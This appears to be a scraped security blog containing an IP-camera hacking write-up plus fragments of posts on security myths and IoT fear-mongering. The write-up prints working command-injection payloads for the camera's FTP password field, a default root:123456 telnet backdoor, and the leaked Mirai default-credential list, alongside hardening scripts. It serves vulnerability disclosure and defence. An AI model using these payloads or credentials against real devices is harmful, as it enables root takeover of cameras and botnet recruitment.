It is true that there is significantly less malware on OSX than on Windows, but this is an "economical" question rather than a "security" one. The more people use OSX, the better target it will become. Some people even believe they are safe from phishing because they are using a Mac!</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjy_eCj2VBHj5yohfZm3MuktGj13GtdqUvt4HADhCdSvnVH3oRSCJNv2tM5Y5l-F7DH4suB_5WUT0CsVsnlL_D8V2m_XPn0xXuOLJqlrbPDNOlgTymHRTxUoiL91tOS9_AJNEejzH0o_98/s1600/ThreatMetrix-Discusses-Sophisticated-Malware-Targeting-OS-X-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjy_eCj2VBHj5yohfZm3MuktGj13GtdqUvt4HADhCdSvnVH3oRSCJNv2tM5Y5l-F7DH4suB_5WUT0CsVsnlL_D8V2m_XPn0xXuOLJqlrbPDNOlgTymHRTxUoiL91tOS9_AJNEejzH0o_98/s200/ThreatMetrix-Discusses-Sophisticated-Malware-Targeting-OS-X-2.jpg" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Updated AV + firewall makes me 100% safe</h3>
<div>
<div style="text-align: justify;">
There is no such thing as 100% safe, and unfortunately, nowadays most malware is written for PROFIT, which means it can bypass these basic protections for days (or weeks, months, years). The more proactive protection is built into the product, the better!</div>
</div>
<h3 style="text-align: justify;">
How to backup data</h3>
<div style="text-align: justify;">
Although this is one of the most important security tips which is not followed by people, my problem here is not the backup advice, but how we as a community failed to provide easy-to-use ways to do it. Now that crypto-ransomware is a real threat to every Windows (and some OSX) user, even those people who have backups on their NAS can find their backups lost. The only hope is that at least OSX has Time Machine, which is not targeted yet, and is the only backup solution which really works.</div>
<div style="text-align: justify;">
The worst part is that we even created NAS devices which can be infected via worms ...</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_laa_fEhq_zwUU_JDrpuXXSXXrru6VcY6anMvxVGhz5Y3nUmBtfT36eWnOLaWzzhw4qh0Fq68EL6DBk7T_FM3-YE1KqDEmjb9dLY1W8hSvIdDRPt2Js-3smMIycY5q2mcTz2gwuDIEaOO/s1600/synolocker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_laa_fEhq_zwUU_JDrpuXXSXXrru6VcY6anMvxVGhz5Y3nUmBtfT36eWnOLaWzzhw4qh0Fq68EL6DBk7T_FM3-YE1KqDEmjb9dLY1W8hSvIdDRPt2Js-3smMIycY5q2mcTz2gwuDIEaOO/s200/synolocker.png" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Disconnect your computer from the Internet when not used</h3>
<div>
<div style="text-align: justify;">
There is no need to comment on this. Whoever recommends things like that, clearly has a problem.</div>
</div>
<h3 style="text-align: justify;">
Use (free) VPN to protect your anonymity</h3>
<div>
<div style="text-align: justify;">
First of all, there is no such thing as a <a href="https://www.safervpn.com/blog/use-free-vpn-hola-risks-cybercrime/" target="_blank">free service</a>. If it is free, you are the service. On the other hand, a non-free VPN can <a href="https://www.mrg-effitas.com/how-your-vpn-can-be-a-front-door-access-to-your-system/" target="_blank">introduce new vulnerabilities</a>, and it won't protect your anonymity. It replaces one ISP with another (your VPN provider). Even TOR cannot guarantee anonymity by itself, and VPNs are much worse.</div>
</div>
<h2 style="text-align: justify;">
The corporate "security tips" myth</h2>
<div>
<div style="text-align: justify;">
"Luckily" these toxic security tips have infected the enterprise environment as well, not just the home users.</div>
</div>
<h3 style="text-align: justify;">
Use robots.txt to hide secret information on public websites</h3>
<div>
<div style="text-align: justify;">
It is 2016 and somehow web developers still believe in this nonsense. And this is why robots.txt is usually the first thing penetration testers or attackers check on a website.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
My password policy is safer than ever</h3>
</div>
<div>
<div style="text-align: justify;">
As previously discussed, passwords are bad. Very bad. And they will stick with us for decades ...</div>
</div>
<h3 style="text-align: justify;">
Use WAF, IDS, IPS, Nextgen APT detection hibber-gibber and you will be safe</h3>
<div>
<div style="text-align: justify;">
Companies should invest more in people and less into magic blinking devices.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Instead of shipping computers with bloatware, ship computers with exploit protection software</div>
<div style="text-align: justify;">
Teach people how to use a password safe</div>
<div style="text-align: justify;">
Teach people how to use 2FA</div>
<div style="text-align: justify;">
Teach people how to use common sense</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Conclusion</h2>
<div>
<div style="text-align: justify;">
Computer security is complex, hard and the risks change every year. Is this our fault? Probably. But these kinds of security tips won't help us save the world. </div>
</div>
<div style="text-align: justify;">
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-1523273486707663942015-09-26T14:02:00.000+02:002020-02-05T12:11:59.795+01:00How I hacked my IP camera, and found this backdoor account<div style="text-align: justify;">
The time has come. I bought my second IoT device, in the form of a cheap IP camera. As it was the most affordable among all the others, my expectations regarding security were low. But this camera was still able to surprise me.</div>
<div style="text-align: justify;">
<br />
Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they are developed on the same SDK. Again, my expectations are low on this.</div>
<h2 style="text-align: justify;">
The obvious problems</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAKaKDWecDRh60dplK0yAH_7f9CfU30NGTQUoO9MnxxXH4zpaMu_14f8KUy-Vz4hAE12gA493M-0-YxOD5R91PKcXylW-Kbw6Q0Pd1URi8i2cXV6NmXHeUrz21jx5U7w5xap94f7Cp8GS1/s1600/em.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAKaKDWecDRh60dplK0yAH_7f9CfU30NGTQUoO9MnxxXH4zpaMu_14f8KUy-Vz4hAE12gA493M-0-YxOD5R91PKcXylW-Kbw6Q0Pd1URi8i2cXV6NmXHeUrz21jx5U7w5xap94f7Cp8GS1/s200/em.png" width="200" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch its output video, and so on. Most people don't bother to change this anyway.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course. </div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Sniffing the traffic between the camera and the desktop application, it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password are sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes in really handy in case you forgot it, but luckily the desktop app has already saved the password for you in clear text in </div>
<div style="text-align: justify;">
"C:\Users\&lt;USER&gt;\AppData\Local\VirtualStore\Program Files (x86)\&lt;REDACTED&gt;\list.dat"</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong - user.ipcam.hk/user.easyn.hk - and China - op2.easyn.cn/op3.easyn.cn. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud, the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.</div>
</div>
<div>
<br /></div>
<div>
Let's run a quick nmap on this device.</div>
<pre>PORT STATE SERVICE VERSION
23/tcp open telnet BusyBox telnetd
81/tcp open http GoAhead-Webs httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_ Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Document Error: Unauthorized
8600/tcp open tcpwrapped
</pre>
<div>
<div style="text-align: justify;">
The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27-page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.</div>
<br />
<h2>
The double-blind command injection</h2>
</div>
<div>
<div style="text-align: justify;">
The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately, it was not working at all, I got an invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems that made the exploitation harder. I call this vulnerability double-blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleep was not a real solution.</div>
<div style="text-align: justify;">
But the third problem was the worst. It was limited to 32 characters. I was able to leak some information via DNS; for example, with the following command I was able to see the current directory:</div>
<pre>$(ping%20-c%202%20%60pwd%60)</pre>
or cleaning up after URL decode:
<br />
<pre>$(ping -c 2 `pwd`)</pre>
but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.<br />
<br />
The following are some examples of my desperate attempts to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.<br />
<pre>$(cp /etc/passwd /tmp/a) ;copy /etc/passwd to a file which has a shorter name
$(cat /tmp/a|head -1>/tmp/b) ;filter for the first row
$(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters
$(ping `cat /tmp/c`) ;leak it via DNS
</pre>
After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...<br />
<br />
I also tried <a href="https://github.com/stasinopoulos/commix" target="_blank">commix</a>, as it looked promising on <a href="https://www.youtube.com/watch?t=297&v=aVTGqiyVz5o" target="_blank">Youtube</a>. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYVywsu3nlALjTw-4fSsSDDSIPhja12y7UCHW869O91GJ8qHE6fy86HDnJYv6f7Ut5oGlYcEDdfSpHuBVgOo5dWW9JBFGGk5lCsrXA_VdNkJ4US0eI6N2vzGcpN5PxlTuBvtpcnYdtFxQ_/s1600/camera2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="435" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYVywsu3nlALjTw-4fSsSDDSIPhja12y7UCHW869O91GJ8qHE6fy86HDnJYv6f7Ut5oGlYcEDdfSpHuBVgOo5dWW9JBFGGk5lCsrXA_VdNkJ4US0eI6N2vzGcpN5PxlTuBvtpcnYdtFxQ_/s640/camera2.png" width="640" /></a></div>
<br />
<br />
But after spending way too much time without progress, I finally found the password to Open Sesame.<br />
<pre>$(echo 'root:passwd'|chpasswd)</pre>
Now, logging in via telnet<br />
<pre>(none) login: root
Password:
BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#
</pre>
Woot woot :) I quickly noticed the root of the command injection problem:<br />
<br />
<pre># cat /tmp/ftpupdate.sh
/system/system/bin/ftp -n<<!
open ftp.site.com 21
user ftpuser $(echo 'root:passwd'|chpasswd)
binary
mkdir PSD-111111-REDACT
cd PSD-111111-REDACT
lcd /tmp
put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg
close
bye
</pre>
<br />
<div style="text-align: justify;">
Whenever a command is put into the FTP password field, it is copied into this script, and after the script is scheduled, it is interpreted by the shell as commands. After this I started to panic that I forgot to save the content of the /etc/passwd file, so how am I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password. </div>
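<div style="text-align: justify;">
The root cause above is that the FTP password is pasted, unquoted, into a shell script that feeds the ftp client through a heredoc whose delimiter is not quoted, so the shell performs command substitution on the password before the ftp client ever sees it. The following is an added example (not the camera's code): it reproduces that generator, puts the fixed generator beside it, and uses cat as a stand-in for /system/system/bin/ftp so it runs on any host; the FTP hostname and the password are constructed.</div>

```shell
#!/bin/sh
# Added example, not the camera's own code: reproduces why ftpupdate.sh is
# injectable and shows the fix. The camera copies the FTP password into a
# script that feeds the ftp client through an UNQUOTED heredoc (<<!), so the
# shell expands $(...) inside the password before the ftp client sees it.
# Quoting the delimiter (<<'!') makes the heredoc body literal.
# `cat` stands in for /system/system/bin/ftp so this runs anywhere (assumption);
# the hostname and the password below are constructed.

# Constructed password with a command substitution; the "injected" command is
# just echo, so the demonstration is harmless.
HOSTILE_PASSWORD='pass$(echo INJECTED)word'

# Mirrors the camera's generator: the inner heredoc delimiter is unquoted.
# $1 = path of script to write, $2 = FTP password as typed into the web UI
write_vulnerable_script() {
    cat > "$1" <<EOF
cat <<!
open ftp.example.invalid 21
user ftpuser $2
bye
!
EOF
}

# Fixed generator: the quoted delimiter disables expansion. A newline in the
# password could still smuggle extra ftp commands, so that is rejected too.
write_fixed_script() {
    if [ "$(printf '%s' "$2" | wc -l | tr -d ' ')" -ne 0 ]; then
        echo "refusing password containing a newline" >&2
        return 1
    fi
    cat > "$1" <<EOF
cat <<'!'
open ftp.example.invalid 21
user ftpuser $2
bye
!
EOF
}

# Runs a generated script and returns the "user" line the ftp client received.
user_line_from() {
    sh "$1" | grep '^user '
}

demo() {
    d=$(mktemp -d)
    write_vulnerable_script "$d/vuln.sh" "$HOSTILE_PASSWORD"
    write_fixed_script "$d/fixed.sh" "$HOSTILE_PASSWORD"
    echo "vulnerable: $(user_line_from "$d/vuln.sh")"   # user ftpuser passINJECTEDword
    echo "fixed:      $(user_line_from "$d/fixed.sh")"  # user ftpuser pass$(echo INJECTED)word
    rm -rf "$d"
}

demo
```

<div style="text-align: justify;">
Quoting the delimiter is the one-character fix for this script, but the sturdier fix is to never build a shell script from user-controlled strings at all and to hand the credentials to the ftp client through a file it reads itself.</div>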
<br />
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh<br />
<br />
<div style="text-align: justify;">
Unfortunately, there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a <a href="https://www.youtube.com/watch?v=a6iW-8xPw3k" target="_blank">luggage password</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwV5VgYLsZRHb1hFuEGYxTESomeR_JWhFLMp9YXgayz4FnGuSLbe1v7tKuNEdzM88htG72yQelUXgbmh9SdSWC6VtF3R9jzplZkqMkqj-HaTAJsd312Ls8XTcpL5a9rpg5UG3RN-rYmZhx/s1600/camera.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwV5VgYLsZRHb1hFuEGYxTESomeR_JWhFLMp9YXgayz4FnGuSLbe1v7tKuNEdzM88htG72yQelUXgbmh9SdSWC6VtF3R9jzplZkqMkqj-HaTAJsd312Ls8XTcpL5a9rpg5UG3RN-rYmZhx/s400/camera.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It is time to recap what we have. <b><u>There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456, there is no GUI to change this password, and changing it via the console only lasts until the next reboot. I think it is safe to call this a backdoor.</u></b></div>
<div style="text-align: justify;">
With this console access we can access the password for the FTP server, for the SMTP server (for alerts), the WiFi password (although we probably already have it), access the regular admin interface for the camera, or just modify the camera as we want. In most deployments, luckily this telnet port is behind NAT or firewall, so not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the Telnet port to be open to the Internet, only the camera HTTP port 81. You know, the one protected with the 4 character numeric password by default.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Last but not least everything is running as root, which is not surprising. </div>
<h2 style="text-align: justify;">
My hardening list</h2>
<div style="text-align: justify;">
I added these lines to the end of /system/init/ipcam.sh:</div>
<pre>sleep 15
echo 'root:CorrectHorseBatteryRedStaple'|chpasswd
</pre>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line into the beginning of /system/init/ipcam.sh</div>
<pre>iptables -A OUTPUT -p udp ! --dport 53 -j DROP</pre>
<div style="text-align: justify;">
</div>
You can use OpenVPN to connect into your home network and access the web interface of the camera. It works from Android, iOS, and any desktop OS.<br />
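<div style="text-align: justify;">
The three hardening steps above (egress filter at the top of the init script, telnetd commented out, root password reset at the end) are easy to apply by hand and just as easy to get half-done. The following is an added example, not from the post: a script that applies all three to a copy of /system/init/ipcam.sh in one idempotent pass and audits the result. The camera's real init script is not shown in the post, so SAMPLE_INIT is a constructed stand-in, and the password is a placeholder.</div>

```shell
#!/bin/sh
# Added example, not from the post: applies the post's three hardening steps
# to a copy of /system/init/ipcam.sh in one reproducible, idempotent pass and
# audits the result. The camera's real init script is not in the post, so
# SAMPLE_INIT below is a constructed stand-in; the password is a placeholder.

# Egress filter from the post: block all outbound UDP except DNS, which
# silences the clear-text cloud protocol (and the mobile apps with it).
EGRESS_RULE='iptables -A OUTPUT -p udp ! --dport 53 -j DROP'

# Constructed stand-in for the camera's init script (assumption).
SAMPLE_INIT='#!/bin/sh
mount -t proc proc /proc
telnetd &
/system/system/bin/ipcam_app &
'

# harden_init SRC DST PASSWORD
#   1. insert the egress filter right after the shebang,
#   2. comment out the telnetd start line,
#   3. append the root password reset, so it survives the reboot that
#      otherwise restores root:123456.
harden_init() {
    src=$1; dst=$2; pw=$3
    case "$pw" in *\'*) echo "password must not contain a single quote" >&2; return 1;; esac
    awk -v rule="$EGRESS_RULE" -v pw="$pw" -v q="'" '
        # drop lines a previous run added, so running twice gives the same file
        $0 == rule || $0 == "sleep 15" || /^echo .root:.*[|] chpasswd$/ { next }
        /^[ \t]*telnetd/ { sub(/telnetd/, "#telnetd") }
        !done && !/^#!/   { print rule; done = 1 }
        { print }
        END {
            if (!done) print rule
            print "sleep 15"
            print "echo " q "root:" pw q " | chpasswd"
        }
    ' "$src" > "$dst"
}

# audit_init FILE -> returns 0 if all three steps are present, 1 with a reason if not
audit_init() {
    f=$1
    grep -q -F -x "$EGRESS_RULE" "$f" || { echo "missing egress filter"; return 1; }
    if grep -q '^[[:space:]]*telnetd' "$f"; then echo "telnetd still enabled"; return 1; fi
    grep -q '| chpasswd$' "$f" || { echo "no root password reset"; return 1; }
    return 0
}

demo() {
    d=$(mktemp -d)
    printf '%s' "$SAMPLE_INIT" > "$d/ipcam.sh"
    audit_init "$d/ipcam.sh" || echo "before: not hardened"
    harden_init "$d/ipcam.sh" "$d/ipcam.hardened.sh" 'PLACEHOLDER-change-me'
    audit_init "$d/ipcam.hardened.sh" && echo "after: hardened"
    cat "$d/ipcam.hardened.sh"
    rm -rf "$d"
}

demo
```

<div style="text-align: justify;">
Run it against a pulled copy of the init script first and diff the result before writing it back: the sleep before chpasswd is kept because the post found the password reset only sticks once the rest of the boot has finished, and the BusyBox on the camera may lack grep -x, so the audit is meant to run from your workstation.</div>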
<h2>
My TODO list</h2>
<div style="text-align: justify;">
<ul>
<li>Investigate the script /system/system/bin/gmail_thread</li>
<li>Investigate the cloud protocol * - see update 2016 10 27</li>
<li>Buy a Raspberry Pi, integrate it with a good USB camera, and watch this IP camera burn</li>
</ul>
<div>
A quick googling revealed I am not the first to find this telnet backdoor account in IP cameras, although others found it via JTAG firmware dump. </div>
<div>
<br /></div>
<div>
And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcIVQQkC-J331Bm_kLEPapmLkM6LjS-MgSjfdwvz2RvDmnGB__4l3P9JQBvjltyOItqtmVWJVnbHfNo937L4CLf-dFZ_bowuYLbV18WWPDiTTcRLOhFcHgFihvmLrfSRlLyeD3lFFkhCyi/s1600/2015-09-25+18.58.41.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcIVQQkC-J331Bm_kLEPapmLkM6LjS-MgSjfdwvz2RvDmnGB__4l3P9JQBvjltyOItqtmVWJVnbHfNo937L4CLf-dFZ_bowuYLbV18WWPDiTTcRLOhFcHgFihvmLrfSRlLyeD3lFFkhCyi/s320/2015-09-25+18.58.41.jpg" width="223" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
When in the next episode of Mr. Robot, you see someone logging into an IP camera via telnet with root:123456, you will know, it is the sad reality.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
If you are interested in generic ways to protect your home against IoT, read <a href="http://jumpespjump.blogspot.nl/2015/08/how-to-secure-your-home-against.html" target="_blank">my previous blog post</a> on this. </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Update: as you can see in the following screenshot, the bad guys already started to take advantage of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCDjthEedav-ewinSwno84GjlyChqnNaFRK9CCDZMDMwgSqr95qND-1LJp_pBX8J4ArbNCrsGc4z4DMgnI_6hVxuDgVfOmkDXyUV-_KtcUGVVtYR_PxANQRHIpVIB3JhGuDON7QdsgZCaW/s640/blogger-image--2098725782.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCDjthEedav-ewinSwno84GjlyChqnNaFRK9CCDZMDMwgSqr95qND-1LJp_pBX8J4ArbNCrsGc4z4DMgnI_6hVxuDgVfOmkDXyUV-_KtcUGVVtYR_PxANQRHIpVIB3JhGuDON7QdsgZCaW/s640/blogger-image--2098725782.jpg" /></a></div>
<br />
<div>
Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.<br />
<br />
root xc3511<br />
root vizxv<br />
root admin<br />
admin admin<br />
root 888888<br />
root xmhdipc<br />
root default<br />
root juantech<br />
root 123456<br />
root 54321<br />
support support<br />
root (none)<br />
admin password<br />
root root<br />
root 12345<br />
user user<br />
admin (none)<br />
root pass<br />
admin admin1234<br />
root 1111<br />
admin smcadmin<br />
admin 1111<br />
root 666666<br />
root password<br />
root 1234<br />
root klv123<br />
Administrator admin<br />
service service<br />
supervisor supervisor<br />
guest guest<br />
guest 12345<br />
guest 12345<br />
admin1 password<br />
administrator 1234<br />
666666 666666<br />
888888 888888<br />
ubnt ubnt<br />
root klv1234<br />
root Zte521<br />
root hi3518<br />
root jvbzd<br />
root anko<br />
root zlxx.<br />
root 7ujMko0vizxv<br />
root 7ujMko0admin<br />
root system<br />
root ikwb<br />
root dreambox<br />
root user<br />
root realtek<br />
root 00000000<br />
admin 1111111<br />
admin 1234<br />
admin 12345<br />
admin 54321<br />
admin 123456<br />
admin 7ujMko0admin<br />
admin 1234<br />
admin pass<br />
admin meinsm<br />
tech tech<br />
mother fucker</div>
<div>
<br />
Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.<br />
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8<br />
Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX2cQGqiKLMMHthT2Mkg1DsEGJ72yYPfZYUz_OkwPpCdhK5IfZo9SXl2276FbvBuSH7sUIWxqUoIrl_sgUGmhJwPakFUGGTqvCJgP7n-guwr1lK5RSDSJKxQU3rEqt-bz8ooxZVBWyU_-j/s1600/ipcamera_protocol2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX2cQGqiKLMMHthT2Mkg1DsEGJ72yYPfZYUz_OkwPpCdhK5IfZo9SXl2276FbvBuSH7sUIWxqUoIrl_sgUGmhJwPakFUGGTqvCJgP7n-guwr1lK5RSDSJKxQU3rEqt-bz8ooxZVBWyU_-j/s640/ipcamera_protocol2.png" width="640" /></a></div>
<br />
Update 2017-03-08: "<span style="text-align: start; white-space: pre-wrap;">Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE),</span><br />
<span style="text-align: start; white-space: pre-wrap;">which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. </span>"<a href="https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt">https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt</a><br />
<br />
Update 2017-05-11: CVE-2017-5674 (see above) and my command injection exploit were combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper: "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."<br />
This issue might be worse than the Mirai worm because this affects cameras and other IoT devices behind NAT where UPnP was enabled.<br />
<a href="http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/">http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/</a><br />
</div>
</div>
</div>
Posted by Z, 2015-08-20 (updated 2019-10-08): How to secure your home against "Internet of Things" and FUD<div style="text-align: justify;">
TL;DR, most of the security news about IoT is full of FUD. Always put the risks in context - who can exploit this and what can the attacker do with it. Most stories only cover the latter.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Introduction</h2>
<div style="text-align: justify;">
There is rarely a day without news that another "Internet of Things" got hacked. "Smart" safes, "smart" rifles, "smart" cars, "smart" fridges, "smart" TVs, "smart" alarm systems, "smart" meters, "smart" bulbs, NAS devices, routers. These devices are getting hacked every day. Because most of these devices were never designed with security as a goal, and some of them have never been tested by security professionals, it is no surprise that these things are full of vulnerabilities.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRiGeG8XxsxePPyoNuLxtyKaF_vUUSdwK0ONcmgZoQOqezlN1eqwntlXITng2Nt5VjvMoqiG09bqbpkWy0ZTTHVWTaOERf0f4xWcw8q1eFLe8kKXvkKTj-DDoPSdaV4NY-u2P_P6HHA42w/s1600/thereisnotiot.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRiGeG8XxsxePPyoNuLxtyKaF_vUUSdwK0ONcmgZoQOqezlN1eqwntlXITng2Nt5VjvMoqiG09bqbpkWy0ZTTHVWTaOERf0f4xWcw8q1eFLe8kKXvkKTj-DDoPSdaV4NY-u2P_P6HHA42w/s400/thereisnotiot.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Independent security researchers find these vulnerabilities, write a cool blog post or give a presentation about the vulnerability and the exploit, and the media forgets the constraints just for the sake of more clicks. "We are all doomed" we can read in the news, but sometimes the risks are buried deeply in technical jargon. Please note I blame the news sites here, not the researchers.</div>
<div style="text-align: justify;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLwdPqBMHzzgGKfoSQsLYYAJNDTwX2pGQUQ-mFJMd1HwCLHwo_uH1oItpGLhKp8LdhhMlr73ej8k3JtOfUR5fNCwHwL3qph8iT3RiRpc_GjFbaPdJ5xi_-2XwPlXkYNLJrryGDwxaBKXFn/s1600/iotjunk.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="475" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLwdPqBMHzzgGKfoSQsLYYAJNDTwX2pGQUQ-mFJMd1HwCLHwo_uH1oItpGLhKp8LdhhMlr73ej8k3JtOfUR5fNCwHwL3qph8iT3RiRpc_GjFbaPdJ5xi_-2XwPlXkYNLJrryGDwxaBKXFn/s640/iotjunk.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">http://www.slideshare.net/danielmiessler/iot-attack-surfaces-defcon-2015</td></tr>
</tbody></table>
